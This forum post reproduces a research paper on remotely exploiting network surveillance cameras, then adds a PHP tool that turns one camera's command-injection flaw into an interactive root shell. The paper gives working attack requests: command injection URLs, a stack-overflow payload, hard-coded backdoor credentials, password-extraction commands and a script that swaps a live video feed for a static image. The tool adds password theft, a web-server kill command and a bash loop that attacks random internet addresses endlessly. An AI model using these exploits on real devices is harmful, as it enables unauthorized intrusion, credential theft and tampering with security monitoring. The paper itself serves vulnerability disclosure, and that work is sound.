Wiedza Exploiting Surveillance Cameras

Discussion in 'Research Tuts/Notes' started by Silas Mariusz, Dec 23, 2015.

Loading...
  1. Silas Mariusz
    Online

    Silas Mariusz SysOp Administrator

    Joined:
    Apr 5, 2008
    Messages:
    8,743
    Local Time:
    9:39 AM
    Ratings:
    +1,826 / 39 / -9
    Followers:
    37
    QNAP:
    TS-x77
    Ethernet:
    1 GbE
    TS-x77 1 GbE
    EXPLOITING SURVEILLANCE CAMERAS
    Like a Ho!ywood Hacker

    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillane54a2164d3e9ed0126f71e8e1d55e87e.

    Craig Heffner
    Tactical Network Solutions
    25 February 2013​


    Abstract
    This paper will examine 0-day vulnerabilities that can be trivially exploited by a remote attacker to gain unauthorized administrative and root-level access to over 50 consumer and professional network surveillance camera models. The devices examined are known to be deployed in homes, hotels, casinos, banks, and prisons, as well as military and industrial facilities.

    It will be shown that these vulnerabilities not only provide an attacker with access to internal and potentially sensitive video and audio feeds, but can also be leveraged as a critical foothold into a target network. Furthermore, this paper will demonstrate a trivial method of remotely freezing and/or replacing legitimate video feeds with a static image of an attacker’s choice, mimicking this classic Hollywood camera hack.


    Previous Work
    Although network camera security is not a new area of investigation, it is certainly an inadequately explored one. With the exception of a few independent vulnerability reports, research in this area has focused on locating cameras with unauthenticated video feeds [1], or attacks that require local network or administrative access [2, 3, 4]. As such, most previous research presented on this topic has been easily dismissed by critics.

    In contrast, this paper will focus on vulnerabilities in the underlying code running on the cameras themselves, with the intent of gaining a foothold in the target network through unauthorized administrative and root-level access, and leveraging that access to view and tamper with the camera’s video feed. These attacks can be carried out from anywhere by anyone who can send packets to the camera.


    Methodology
    While all of the vulnerabilities demonstrated in this paper have been confirmed against live devices, the vulnerability discovery and exploit development process was performed entirely on firmware images downloaded for free from vendor websites. Analysis and extraction of these firmware images was accomplished using Binwalk [5] and the Firmware-Mod-Kit [6], while disassembly, emulation and debugging of code was performed using IDA Pro [7] and Qemu [8].

    The use of these tools has been adequately described elsewhere [9, 10] and as such will not be detailed in this paper. However, it is worth noting that such tools allow attackers to identify and exploit vulnerabilities in embedded systems without ever purchasing a target device for testing.

    Since all of the cameras examined here report their model number or some other unique identifier string in their login prompts, a remote attacker could easily fingerprint the target camera, download its firmware, locate a vulnerability and exploit the target all in a matter of hours and without any additional cost.


    D-Link DCS-7410
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillandd6c6c8752e589c61e730f9adf0af566.

    The D-Link DCS-7410 is an outdoor, weatherproof, day and night security camera that includes Power over Ethernet (PoE) support. At just under $1,000 USD, it is one of D-Link’s most expensive cameras.

    As with most other network cameras, the primary administrative interface for the DCS7410 is provided via a built-in web server; in this case, the open source lighttpd server [11]. On boot, the camera’s start up scripts generate access rules for the lighttpd server in order to protect streaming video pages and the administrative interface:

    Code (INI):
    1. ...
    2. “/cgi/admin/” => (
    3.     “method” => “basic”,
    4.     “realm” => “$model”,
    5.     “require” => “user=$_AdminUser_ss”
    6. ),
    7. ...
    One access rule is created for each subdirectory in lighttpd’s web root directory, all except for the cgi-bin directory:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan351710367b25f588b97923fdd1ca731c.

    Most of the camera’s CGI scripts are located in the protected cgi directory. The unprotected cgi-bin directory only contains a single file, rtpd.cgi, which is a bash script that can be used for starting and stopping the camera’s RTP daemon.

    However, the rtpd.cgi script has a serious flaw. It parses request parameters by replacing all ampersands in $QUERY_STRING with spaces, and then eval’s the result:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan17101aafba438c8f3f43ed06df4811f9.

    If used as intended, the following HTTP request would result in an environment variable named $action being created whose value would be set to “start”:
    Code (Bash):
    1. wget http://192.168.1.101/cgi-bin/rtpd.cgi?action=start
    But because data in $QUERY_STRING is blindly eval’d, an unauthenticated attacker can execute any command by simply specifying it as part of the HTTP GET parameters:
    Code (Bash):
    1. wget http://192.168.1.101/cgi-bin/rtpd.cgi?reboot
    Since lighttpd and the CGI scripts that it executes run with root privileges, so do the attacker’s commands. What’s more, the output from the specified command(s) will be echoed back to the attacker’s web client, providing a built-in web root FAQ shell from which to launch further attacks into the network.

    An attacker can also use this vulnerability to retrieve the plain-text administrative password for the camera. The following command is executed by the camera’s start up scripts in order to retrieve the administrative password from NVRAM:
    Code (Bash):
    1. echo AdminPasswd_ss | tdb get HTTPAccount
    Replacing the spaces with ampersands for use with rtpd.cgi, the attacker’s request becomes:

    Code (Bash):
    1. wget http://192.168.1.101/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount
    The output from this command then returns the administrative password back to the attacker’s web client:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan0626a31230de5088ceb24689a9f461b9.

    This vulnerability has been confirmed in most firmware versions for the following cameras:
    V E N D O RM O D E L
    D-LinkDCS-1130
    D-LinkDCS-2102
    D-LinkDCS-2121
    D-LinkDCS-3410
    D-LinkDCS-5230
    D-LinkDCS-5605
    TrendnetTV-IP512WN
    TrendnetTV-IP512P
    TrendnetTV-IP522P
    TrendnetTV-IP612WN


    While the affected consumer-grade cameras are commonly located in homes and small offices, higher end models such as the DCS-5605 and DCS-7410 are prohibitively expensive and are likely to only be found in larger businesses or corporations. Shodan [12] reports over 20,000 publicly accessible and potentially vulnerable cameras at the time of this writing.


    Linksys WVC80N
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan95731cbde218145caf1e40dfccc458e4.

    The Linksys WVC80N is wireless color video and audio IP camera. At $120 USD it is clearly targeted at the SOHO consumer market.

    In the web interface’s default configuration, all unprivileged users (including unauthenticated users) are allowed access to the /img/snapshot.cgi URL, which is actually a symlink to the /adm/ez.cgi file:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan83a3d4b96fcc9683e8132ee4bacab6d4.

    The ez.cgi executable is referenced by various other symlinks as well, and selects which action to perform based on which symlink was invoked. The snapshot.cgi symlink action specifically is handled by the sub_AE64 function:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillane91054d5bb8262712f1dba34471de789.

    The sub_AE64 function however contains a serious flaw in which it takes the QUERY_STRING environment variable containing user-supplied data and strcpy’s it to a fixed size stack variable (“dest”):
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan76e16237189d2b464fc4599a6d322974.

    The dest stack variable is located only 152 bytes away from the saved return address on the stack:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillana75a303fec962a0116f5bc4bee898485.

    Thus the saved return address is easily overwritten by submitting a request to /img/snapshot.cgi with a query string of 152 bytes or more:
    Code (Bash):
    1. wget http://192.168.1.101/img/snapshot.cgi?$(perl -e ‘print “A”x152’)
    While this can be used to gain arbitrary code execution on the device, a simpler exploit may be crafted. Since the ez.cgi binary also handles requests for restricted symlinks, an attacker can force the vulnerable function to return to a restricted handler thus invoking functionality that would otherwise require administrative access.

    The function handler for the admcfg.cfg symlink (sub_9B88) is perhaps the easiest and most obvious; this function requires no arguments and returns the device’s current running configuration to the requestor, including administrative and wireless credentials:
    Code (Bash):
    1. wget http://192.168.1.101/img/snapshot.cgi?$(perl -e ‘print “A”x148; print “\x88\x9B”’)
    Sending the above unauthenticated request to the camera returns what appears to be a base64 encoded configuration file:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan693c35646969d37347028c2711234d43.

    However, attempting to use a standard base64 decoding against this data fails:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillaneda732c44b9e4879282f6ae368a465b0.

    This is because the WVC80N uses a non-standard base64 key string, as documented in the device’s user guide:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanc76a685e7f3223244f537c578a115219.

    Replacing the standard base64 key string with this custom one in Python’s base64 module is trivial, and allows an attacker to properly decode the entire configuration file, which includes plain-text administrative and wireless credentials:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan6254b48fe357f7f4cabcc30d4d107e21.

    This provides the attacker not only with access to the camera’s wireless network, but also with administrative access to the camera itself including the ability to enable/disable audio and upload new firmware images:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanc7c96c035727acb51936902499c5213b.

    This vulnerability has been confirmed in all firmware versions of both the WVC80N as well as its predecessor, the WVC54GCA. At the time of this writing, Shodan reports over 8,200 publicly accessible cameras located in homes, business and construction sites, the majority of which allow unauthenticated access to the /img/snapshot.cgi URL.


    Cisco PVC-2300
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanf6de55fd5262368aedff5303337cdbe6.

    The Cisco PVC-2300 is a PoE-capable business internet video camera designed for small business surveillance requirements and costs approximately $300 USD.

    Its administrative web interface is protected via .htpasswd files in critical sub-directories within the camera’s web root directory:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan43946145ea91e6d88da61c2e86038284.

    There is only one sub-directory inside the web root that does not contain a .htpasswd file, which is the /usr/local/www/oamp directory:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanf86b6078cef576d20bbe33cbc96b6e34.

    This directory is interesting, as it only contains two executable files - oamp.cgi and oamp_loadFirmware - with the remaining XML files being symlinks to oamp.cgi.

    A cursory examination of the oamp.cgi binary reveals that it expects an action GET parameter to be set:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan5461579624b737147e58c027c8ab53fb.

    The argument to the action parameter can be a number of values, including downloadConfigurationFile, uploadConfigurationFile, updateFirmware, loadFirmware, and more. Before executing the specified action however, oamp.cgi checks to see if a valid session ID has been specified:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillane1d3acefd163091b37a9cc1d5b8c9ad4.

    If a valid session ID has not been supplied, then the only allowed action is the login action. The function responsible for validating the login first obtains the user name and password specified in the GET request:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan3fa3112e991924e2d87a55f2d092c0c3.

    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan8d58f9c38696428210e47ca95cff8f82.

    It then obtains the values of the l1_user and l1_pwd keys from the camera’s configuration file:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanded9981fa2c26213950c96878608ee54.

    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillane14dcdc904d187e4039abafb083aa92b.

    Finally, it compares the l1_usr value to the specified user name and the l1_pwd value to the specified password. If they match, a valid session ID is issued to the requestor.

    The problem is that this OAMP interface is completely undocumented, and the l1_usr and l1_pwd values, which are independent of the primary administrative credentials and are set to the same default values for all PVC-2300 cameras, cannot be easily changed:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan14a57222abecc4bde19a22ebaeeef950.

    An unauthenticated attacker can obtain a valid OAMP session ID by issuing the following request:
    Code (Bash):
    1. wget http://192.168.1.101/oamp/System.xml?action=login&user=L1_admin&password=L1_51
    The resulting session ID value will be specified in the HTTP response headers:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan7ef94196b7ae9b4a00679894bad0c6fb.

    With a session ID in hand, an attacker is free to invoke any of the previously mentioned actions as long as he supplies this session ID header in his requests. The following request can be issued to download the camera’s current running configuration file; note that the request may be sent to any of the XML files, as they all are symlinks to the oamp.cgi executable.:
    Code (Bash):
    1. wget --header=”sessionID: 57592414” http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
    This request returns what appears to be a base64 encoded file:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan2c0ef954cffeac4d0def41bcc0b2f8ac.

    However, attempts to base64 decode the file contents only produce garbage data:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan059349be23d5006cf1306f8c339906c5.

    This is because the PVC-2300 uses a non-standard base64 key string, as evidenced by analyzing its encode64 and decode64 functions:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanf257c1c6ab82a4ba0bd487ba94f7abca.

    Replacing the standard base64 key string with this custom one in Python’s base64 module is trivial, and allows an attacker to properly decode the entire configuration file, which includes plain-text administrative credentials:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan1db98fcd575e05fb78c155ff71870527.

    Although this grants an attacker access to the camera’s video feed and administrative interface, the loadFirmware action can be leveraged to further escalate the attacker’s privileges to root.

    The loadFirmware action accepts a url GET parameter:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanb288f521d8a507b147eb4d8f16e6689d.

    The value of the url parameter is then passed to the system2 function, along with a format string:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan6bf03a6b9b68ef3a114bbe3f401eaae8.

    The system2 function simply generates a command from the format string and url before calling libc’s system function, allowing an attacker to inject arbitrary FAQ shell commands via the url parameter. The attacker’s command will be executed with root privileges, and while some validation is performed on the url value, these checks are trivial to bypass:
    Code (Bash):
    1. wget --header=”sessionID: 57592414” http://192.168.1.101/oamp/System.xml?action=loadFirmware&url=https://127.0.0.1:6 5534/;reboot;
    This vulnerability has been confirmed on all firmware versions of both the PVC-2300 and the WVC-2300 Cisco surveillance cameras. Shodan queries at the time of this writing revealed over 400 publicly accessible and potentially vulnerable cameras belonging to hotels, server rooms, and engineering companies who develop equipment for the international space station.


    IQInvision IQ832N
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan7da75ee31f4f51ff1e909a921c6f4bca.

    The IQ832N is part of IQInvision’s Sentinal product line, is an outdoor day and night high definition camera, and costs over $1,000 USD.

    By default, these cameras provide a video feed without authentication, and none of the deployed installations that were investigated had changed this default setting. While the administrative interface is password protected, providing users with access to any resources without authentication can open up a larger attack surface for exploitation.

    In this case, the attack vector takes the form of the oidtable.cgi page, which can be requested by unauthenticated users. This CGI page accepts only one parameter, grep, which is used to filter the results returned by the oidtable.cgi page:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanedfc7ed85ea7f4bed48b1c309ef5c027.

    After verifying that the specified grep value is less than 32 characters long, oidtable.cgi sprintf’s the grep value into a command string, which is later passed to popen:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanea6eed3d83d8a55d371399f5588f86d0.

    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanff26c1160dac4496805c9a743950373e.

    This allows an unauthenticated attacker to quite easily inject arbitrary FAQ shell commands which will be executed as root. Further, the output of these commands will be echoed back to the attacker’s web client, providing a built-in web root FAQ shell from which to launch further attacks into the network (note the use of $IFS in place of white space characters):
    Code (Bash):
    1. wget http://192.168.101/oidtable.cgi?grep=’$IFS/tmp/a;ps;’
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanb237aaac47e33c877d15d67e0e1d0e19.

    Although the entire grep string is limited to 32 characters, longer commands could simply be echoed into a FAQ shell script for later execution. Additionally, this camera comes with netcat installed, and with the infamous -e option enabled, allowing an attacker to initiate a simple reverse-callback FAQ shell.

    This vulnerability can also be leveraged to get or replace the encrypted administrative password, which is stored in /etc/privpasswd, is encrypted using DES, and can be attacked using standard password cracking tools like John the Ripper:
    Code (Bash):
    1. wget http://192.168.1.101/oidtable.cgi?grep=’$IFS/etc/privpasswd;’
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan00a18bb69a0361c2eeeadd25b8b12886.

    Much of IQInvision’s product line is affected by this vulnerability including their 3-series, 7-series, Sentinel, Alliance-Pro, Alliance-MX and Alliance-Mini cameras. These cameras are known to be used by businesses, police, banks, local governments, prisons, casinos and DHL [13]. At the time of this writing, Shodan reports over 100 publicly accessible and potentially vulnerable cameras.


    3SVision N5071
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillande9235218f01e55b94320e09d05f8628.

    The N5071 is a high-resolution, pan/tilt, weatherproof outdoor camera. Its cost is listed as “Contact Us”.

    A cursory analysis of the camera’s web server reveals a hard-coded administrative user name and password (3sadmin:27988303) baked directly in to the binary:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanf299638aa675d0554e42e0fd618c0674.

    Any unauthorized user can use these credentials to gain full administrative control of the camera and subsequently gain access to the camera’s video feed.

    As with the other cameras examined here, the N5071’s code is riddled with unsafe function calls, such as system, sprintf and strcpy, and having administrative credentials expands a hacker’s attack surface significantly.

    Although not supported specifically by the N5071, other affected 3SVision products support local storage capabilities. Part of the administrative interface is devoted to the management of locally stored files, which is handled by the records.cgi page, and subsequently by the do_records function in the camera’s web server:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan303351ac6a3dada8008e1415810f5426.

    One of the actions supported by records.cgi is remove. If the remove action is specified, do_records checks to see if a file name has also been specified:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan19b3ea86d1ee82305755ba656bc7a29f.

    If so, the specified file name is then passed unfiltered to a sprintf which is used to format an rm command that is subsequently shelled out via the system function:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan931e175b87101270a054da33042033a5.

    An unauthorized attacker can use the backdoor credentials to access records.cgi and inject arbitrary FAQ shell commands as root:
    Code (Bash):
    1. wget --user=3sadmin --password=27988303 ‘http://192.168.1.101/records.cgi?action=remove&storage=sd&filename=foobar`reboot`
    Most, if not all, of 3SVision’s products contain the same hard-coded credentials shown above, including their S2071 and S4071 video servers. Many cameras and video servers manufactured by Alinking also use the same web server, but have a different set of hardcoded credentials. The following devices have been confirmed to be affected:
    V E N D O RM O D E L
    3SVisionN1072
    3SVisionN1073
    3SVisionN3071
    3SVisionN3072
    3SVisionN3073
    3SVisionN3074
    3SVisionN5071
    3SVisionN5072
    3SVisionN6071
    3SVisionN6072
    3SVisionN6073
    3SVisionN6074
    3SVisionN6075
    3SVisionN6076
    3SVisionN8071
    3SVisionN8072
    3SVisionN9071
    3SVisionS2071
    3SVisionS4071
    AlinkingALC-9122P
    AlinkingALC-9151
    AlinkingALC-9152
    AlinkingALC-9153
    AlinkingALC-9154
    AlinkingALC-9171
    AlinkingALC-9351
    AlinkingALC-9352
    AlinkingALC-9451
    AlinkingALC-9453
    AlinkingALC-9551
    AlinkingALC-9553
    AlinkingALC-9652
    AlinkingALC-9751
    AlinkingALC-9751W
    AlinkingALC-9852
    AlinkingALC-9852W
    AlinkingALS-7721
    AlinkingALS-7743


    These cameras are known to be installed in Chinese military, energy and industrial facilities [14]. At the time of this writing, Shodan reports over 100 publicly accessible and potentially vulnerable cameras.


    Modifying Video Feeds
    Although gaining unauthorized access to video feeds is interesting, a far more malicious undertaking is to modify those video feeds - a technique popularized by many Hollywood movies. While it has been shown that this can be accomplished by man-in-the-middling network traffic [4], this typically requires access to the local network which is a privilege that a remote attacker usually does not have.

    However, if a remote attacker can gain root access to a camera through vulnerabilities such as those described above, he can take full control over all functionality of the camera, including the video feed. Although in some cases this could be a significant undertaking for the attacker, often a quick hack can be performed to temporarily freeze or replace legitimate video feeds from the camera, without limiting the attacker’s access to the video feed.

    Such an attack can be successfully carried out against the Trendnet TV-IP410WN pan/tilt network camera. This camera was selected as a proof of concept due in no small part to its affordability, but also because it contains the same classes of vulnerabilities detailed elsewhere in this paper. Namely, it contains a backdoor account (productmaker:ftvsbannedcode) and multiple command injection bugs which provide a built-in web root FAQ shell from which to issue arbitrary system commands [15].

    Armed with these vulnerabilities, a remote attacker can begin interrogating the system to determine which process is responsible for providing access to the camera’s video feed. In the case of video feeds access via the web interface, this process is easily identified as mjpg.cgi by obtaining a process listing:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan83386a3b43faeb75425ecb90affde3ae.

    There will be one instance of the mjpg.cgi process for every live video stream accessed via the camera’s web interface. Here, the camera can be seen keeping guard over the administrator’s beer:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan7a112aab16e287ad8151b91ca18e34cf.

    However, if the attacker simply kills the mjpg.cgi process responsible for streaming the video feed to the administrator’s web browser, the video stream will stop and the image displayed in the administrator’s web browser will remain frozen on the last image received from mjpg.cgi:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan2ebbbc3e42068b89f9592181273df648.

    This leaves the attacker free to steal the administrator’s beer without the administrator’s knowledge:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan4fb5236e6d2171ca9aa836d5710b0b8f.

    This is an incredibly simple, albeit temporary, method of freezing legitimate video feeds from the camera. The biggest problem with this technique is that if the administrator refreshes his browser page, he will again be able to see the live video feed and realize that his beer is gone.

    A slightly more sophisticated attack would involve replacing the mjpg.cgi executable with an executable of the attacker’s choosing, which could then feed any arbitrary image to the administrator. A very simple implementation of this can be accomplished with nothing more than a static image and a bash script:

    Code (Bash):
    1. #!/bin/sh
    2. echo -ne “HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n” cat /tmp/static_img.jpg
    If the attacker replaces the original mjpg.cgi file on disk with the above bash script, then whenever the administrator attempts to view the video feed via the web interface, he will instead be given a static JPEG image of the attacker’s choosing:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillan98d67514f74f3d37c37e1d2a222cf74b.

    Further, the attacker can create a copy of the original mjpg.cgi file elsewhere in the web root directory so that the attacker will still be able access the live video feed:
    anas.devspark.pl_h_US_13_Heffner_Exploiting_Network_Surveillanf9f67a5621de7b469a35f410f4d79fe4.

    These hacks are simple and effective, and although the complexity of such attacks can increase depending on what services or protocols are responsible for providing access to the camera’s video stream, the fundamental premise remains the same: once the attacker is root, he controls the camera and all functionality thereof.


    Conclusion
    Network surveillance cameras - and embedded devices in general - suffer from trivial vulnerabilities due to poor programming practices and lack of appropriate quality assurance processes. As a result, devices which are trusted to provide security can be compromised and used by an attacker to gain access inside a target network, or to feed falsified data to unknowing administrators. Such vulnerabilities as those revealed here will persist in embedded devices for the foreseeable future, until security is taken seriously by vendors and developers alike.


    References
    [1] Hack to Search and View Free Live Webcam with Google Search http://www.mydigitallife.info/hack-to-search-and-view-free-live-webcam-with-google-search/
    [2] Using Metasploit to Access Standalone CCTV Video Surveillance Systems http://blog.gdssecurity.com/labs/2012/5/15/using-metasploit-to-access-standalone-cctv-video-s urveillanc.html
    [3] Owning Big Brother, Or How to Crack Into Axis IP Cameras http://www.procheckup.com/media/43240/vulnerability_axis_2100_research.pdf
    [4] Advancing Video Attacks With Video Interception, Recoding and Replay http://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-ostrom-sambamoorthy-vi deo_application_attacks.pdf
    [5] Binwalk Firmware Analysis Tool devttys0/binwalk · GitHub
    [6] Firmware-Mod-Kit firmware-mod-kit - Modify firmware images without recompiling! - Google Project Hosting
    [7] IDA Pro by Hex-Rays IDA: About
    [8] Qemu Open Source Processor Emulator QEMU
    [9] Exploiting Embedded Systems - Part 1 Exploiting Embedded Systems – Part 1 – /dev/ttyS0
    [10] Exploiting Embedded Systems - Part 3 Exploiting Embedded Systems – Part 3 – /dev/ttyS0
    [11] Lighttpd Home Page Home - Lighttpd - fly light
    [12] Shodan - Computer Search Engine Shodan
    [13] Case Studies - IQeye Smart Camera Systems Vicon
    [14] 3SVision Surveillance Systems Service Successful Stories 3S Vision Surveillance System Service
    [15] Multiple Vulnerabilities in Several IP Camera Products SecurityFocus




    IP Cam FAQ shell
    IPCS is a command line script for testing and exploiting a wide range of IP cameras as demonstrated by Craig Heffner in "Exploiting Surveillance Cameras Like a Hollywood Hacker".

    Requirements
    • PHP 5
    • A distribution of Linux. I haven't and won't test this on Windows.

    Code:
    PHP:
    Select All
    1. <?php
    2.  
    3. ini_set('default_socket_timeout', 5);
    4.  
    5. $options = getopt('u:c:g:');
    6.  
    7. if(!isset($options['u'])) {
    8.   die("Option -u not set!\n");
    9. }
    10.  
    11. // Run a initial check to make sure the camera is vulnerable
    12. echo '';
    13. $request = request('whoami', 1);
    14.  
    15. if($request['body'] != 'root' && $request['status'] != 'HTTP/1.1 200 OK') {
    16.   if(!isset($options['g'])) {
    17.     die("Sorry, the server specified isn't vulnerable.\n");
    18.   } else {
    19.     die();
    20.   }
    21. }
    22.  
    23. if(isset($options['c'])) {
    24.   die("This server is vulnerable, but because you used the -c option you won't be dropped in to a shell.\n");
    25. }
    26.  
    27. stream_set_blocking(STDIN, false);
    28.  
    29. $line = '';
    30. $prompt = 'ipcamshell> ';
    31.  
    32. echo "Those who do not understand UNIX are condemned to reinvent it, poorly. — Henry Spencer\n";
    33. echo $prompt;
    34.  
    35. while(true) {
    36.   $c = fgetc(STDIN);
    37.   if($c !== false) {
    38.     if($c != "\n") {
    39.       $line .= $c;
    40.     } else {
    41.       if($line == 'exit' || $line == 'quit') {
    42.         break;
    43.       } elseif($line == 'getadminpass') {
    44.         // Fetch the admin password (lol, fail)
    45.         $pass =  request('echo AdminPasswd_ss|tdb get HTTPAccount');
    46.         $pass = str_replace('AdminPasswd_ss=', '', $pass);
    47.         $pass = str_replace('"', '', $pass);
    48.         // There are likely to be more characters which are escaped. Found one? Send a pull request.
    49.         $pass = str_replace('\$', '$', $pass);
    50.  
    51.         echo "Username: admin\nPassword: {$pass}\n";
    52.       } elseif($line == 'killswitch') {
    53.         echo "WARNING: THIS WILL KILL THE WEBSERVER. You'll lose access and the web server will be shut down. If you're sure you want to do this, run `killswitch --confirm`.\n";
    54.       } elseif($line == 'killswitch --confirm') {
    55.         // Kill lighttpd and exit.
    56.         echo "Web server is shutting down...\n";
    57.         echo request('killall -15 lighttpd', 0, 0);
    58.  
    59.         echo "GONE.\n";
    60.         break;
    61.       } else {
    62.         echo request($line)."\n";
    63.       }
    64.  
    65.       echo $prompt;
    66.       $line = '';
    67.     }
    68.   }
    69. }
    70.  
    71. function request($string, $initial_check=0, $warn=1) {
    72.   // Forgive me. Forgive me.
    73.   global $options;
    74.  
    75.   $url = $options['u'].'/cgi-bin/rtpd.cgi?';
    76.  
    77.   // Replace spaces with ampersands, the CGI script replaces ampersands with spaces...
    78.   $string = preg_replace("/[\s]/", "&", $string);
    79.   $contents = @file_get_contents($url.$string);
    80.  
    81.   // We remove the last line here because it's useless junk
    82.   $lines = explode("\n", trim($contents));
    83.   unset($lines[count($lines) - 1]);
    84.   $final = implode($lines, "\n");
    85.  
    86.   if($initial_check == 1) {
    87.     $headers = @get_headers($url.$string);
    88.     return array('body' => $final, 'status' => $headers[0]);
    89.   }
    90.  
    91.   if($final == "" && $warn == 1) {
    92.     return "No output. This may be a response as a result of the command executed or there may be something in STDERR. Check /tmp/lighttpd.error.log for potential errors.";
    93.   }
    94.   return $final;
    95. }
    96.  
    97. // Stolen from Stack Overflow.
    98. function parse_headers($header) {
    99.   $parsed = array_map(function($x) { return array_map("trim", explode(":", $x, 2)); }, array_filter(array_map("trim", explode("\n", $header))));
    100. }

    Basic Usage
    Using IPCS is pretty straight forward. You pass the URL to ipcs.php via the -u option.
    Code (Bash):
    1. php ipcs.php -u http://192.168.0.3:8080
    If the camera is vulnerable you'll be dropped in to a "FAQ shell" as root and be able to exploit the camera further.
    Code (Text):
    1. $ php ipcs.php -u http://192.168.0.3:8080
    2. Those who do not understand UNIX are condemned to reinvent it, poorly. — Henry Spencer
    3. ipcamshell>
    It's very much like being logged in to a stripped down Unix server as root.
    Code (Text):
    1. ipcamshell> whoami
    2. root
    3. ipcamshell> id
    4. uid=0(root) gid=0(root)
    5. ipcamshell> ls /
    6. bin
    7. dev
    8. etc
    9. lib
    10. linuxrc
    11. mnt
    12. opt
    13. proc
    14. sbin
    15. scripts
    16. tmp
    17. usr
    18. var
    19. ipcamshell> cat /etc/passwd
    20. root:x:0:0:Linux User,,,:/:/bin/sh
    Use quit, exit, or ^C to exit.


    Further Attacks
    Of course it wouldn't be very fun without the ability to login and view the camera...
    Code (Text):
    1. ipcamshell> getadminpass
    2. Username: admin
    3. Password: hunter2
    If you wish to kill the web server (to prevent someone from accessing the web interface temporarily), run the killswitch command. Note that the camera will continue to record regardless of this. Shutting the server down might switch the camera off, although that's complete speculation.

    If the camera isn't vulnerable, the server isn't up, or the internet hates you, you'll recieve the following message
    Sorry, the server specified isn't vulnerable.


    Automation
    IPCS has the potential to be automated in different ways. This, I'm going to leave to you. The -c option won't drop you in to a FAQ shell after successfully exploiting a server, and the -g option surpresses the "Sorry, the server specified isn't vulnerable." messages for failed attempts.

    As an example, the following bash script will forever try to attack randomly generated IPv4 addresses.
    Code (Bash):
    1. #!/bin/bash
    2. while true; do export ip=$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)) && echo "Trying $ip..." && php ipcs.php -c 1 -g 1 -u http://$ip; done;
    This is slow, and will likely yield nothing without extremely good luck. Use your imagination. :)


    Note
    I do not claim the description or purpose of this tool to be 100% accurate. If you see anything which is incorrect in this document, please submit a pull request or open a new issue.